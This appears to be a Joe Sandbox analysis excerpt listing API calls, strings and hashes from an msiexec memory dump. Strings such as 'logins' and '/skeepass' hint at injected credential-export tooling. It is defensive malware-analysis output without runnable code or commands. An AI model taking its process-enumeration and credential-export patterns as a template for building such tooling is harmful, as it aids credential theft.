                      Similarity
                      • API ID: _snwprintfmemset$wcscpy$wcscat
                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                      • API String ID: 1607361635-601624466
                      • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                      • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                      • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                      • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _snwprintf$memset$wcscpy
                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                      • API String ID: 2000436516-3842416460
                      • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                      • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                      APIs
                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                      • String ID:
                      • API String ID: 1043902810-0
                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                      APIs
                      • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                      • _snwprintf.MSVCRT ref: 0044488A
                      • wcscpy.MSVCRT ref: 004448B4
                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ??2@??3@_snwprintfwcscpy
                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                      • API String ID: 2899246560-1542517562
                      • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                      • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                      • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                      • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                      APIs
                      • memset.MSVCRT ref: 0040DBCD
                      • memset.MSVCRT ref: 0040DBE9
                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                        • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                        • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                        • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                      • wcscpy.MSVCRT ref: 0040DC2D
                      • wcscpy.MSVCRT ref: 0040DC3C
                      • wcscpy.MSVCRT ref: 0040DC4C
                      • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                      • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                      • wcscpy.MSVCRT ref: 0040DCC3
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                      • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                      • API String ID: 3330709923-517860148
                      • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                      • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                      • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                      • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                      APIs
                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                      • memset.MSVCRT ref: 0040806A
                      • memset.MSVCRT ref: 0040807F
                      • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                      • _wcsicmp.MSVCRT ref: 004081C3
                      • memset.MSVCRT ref: 004081E4
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                        • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                        • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                      • String ID: logins$null
                      • API String ID: 2148543256-2163367763
                      • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                      • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                      • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                      • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                      APIs
                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                      • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      • memset.MSVCRT ref: 004085CF
                      • memset.MSVCRT ref: 004085F1
                      • memset.MSVCRT ref: 00408606
                      • strcmp.MSVCRT ref: 00408645
                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                      • memset.MSVCRT ref: 0040870E
                      • strcmp.MSVCRT ref: 0040876B
                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                      • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                      • String ID: ---
                      • API String ID: 3437578500-2854292027
                      • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                      • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                      APIs
                      • memset.MSVCRT ref: 0041087D
                      • memset.MSVCRT ref: 00410892
                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                      • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                      • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                      • GetSysColor.USER32(0000000F), ref: 00410999
                      • DeleteObject.GDI32(?), ref: 004109D0
                      • DeleteObject.GDI32(?), ref: 004109D6
                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                      • String ID:
                      • API String ID: 1010922700-0
                      • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                      • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                      • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                      • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                      APIs
                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                      • malloc.MSVCRT ref: 004186B7
                      • free.MSVCRT ref: 004186C7
                      • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                      • free.MSVCRT ref: 004186E0
                      • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                      • malloc.MSVCRT ref: 004186FE
                      • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                      • free.MSVCRT ref: 00418716
                      • free.MSVCRT ref: 0041872A
                      • free.MSVCRT ref: 00418749
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: free$FullNamePath$malloc$Version
                      • String ID: |A
                      • API String ID: 3356672799-1717621600
                      • Opcode ID: 96c66879b4041adad5e36cadfde5f9aa16ffca4bba1cd09b44366f464025a3b3
                      • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                      • Opcode Fuzzy Hash: 96c66879b4041adad5e36cadfde5f9aa16ffca4bba1cd09b44366f464025a3b3
                      • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _wcsicmp
                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                      • API String ID: 2081463915-1959339147
                      • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                      • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                      • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                      • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                      APIs
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                      • FreeLibrary.KERNEL32(00000000), ref: 00413951
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                      • API String ID: 2012295524-70141382
                      • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                      • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                      • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                      • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                      APIs
                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: AddressProc$HandleModule
                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                      • API String ID: 667068680-3953557276
                      • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                      • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                      • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                      • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                      APIs
                      • GetDC.USER32(00000000), ref: 004121FF
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                      • SelectObject.GDI32(?,?), ref: 00412251
                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                      • SetCursor.USER32(00000000), ref: 004122BC
                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                      • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                      • String ID:
                      • API String ID: 1700100422-0
                      • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                      • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                      • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                      • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                      APIs
                      • GetClientRect.USER32(?,?), ref: 004111E0
                      • GetWindowRect.USER32(?,?), ref: 004111F6
                      • GetWindowRect.USER32(?,?), ref: 0041120C
                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                      • GetWindowRect.USER32(00000000), ref: 0041124D
                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                      • String ID:
                      • API String ID: 552707033-0
                      • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                      • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                      • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                      • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$_snwprintf
                      • String ID: %%0.%df
                      • API String ID: 3473751417-763548558
                      • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                      • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                      • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                      • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                      APIs
                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                      • KillTimer.USER32(?,00000041), ref: 004060D7
                      • KillTimer.USER32(?,00000041), ref: 004060E8
                      • GetTickCount.KERNEL32 ref: 0040610B
                      • GetParent.USER32(?), ref: 00406136
                      • SendMessageW.USER32(00000000), ref: 0040613D
                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                      • String ID: A
                      • API String ID: 2892645895-3554254475
                      • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                      • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                      • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                      • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                      APIs
                      • LoadMenuW.USER32(?,?), ref: 0040D97F
                        • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                        • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                        • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                        • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                      • DestroyMenu.USER32(00000000), ref: 0040D99D
                      • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                      • GetDesktopWindow.USER32 ref: 0040D9FD
                      • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                      • memset.MSVCRT ref: 0040DA23
                      • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                      • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                      • DestroyWindow.USER32(00000005), ref: 0040DA70
                        • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                      • String ID: caption
                      • API String ID: 973020956-4135340389
                      • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                      • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                      • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                      • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                      APIs
                      Strings
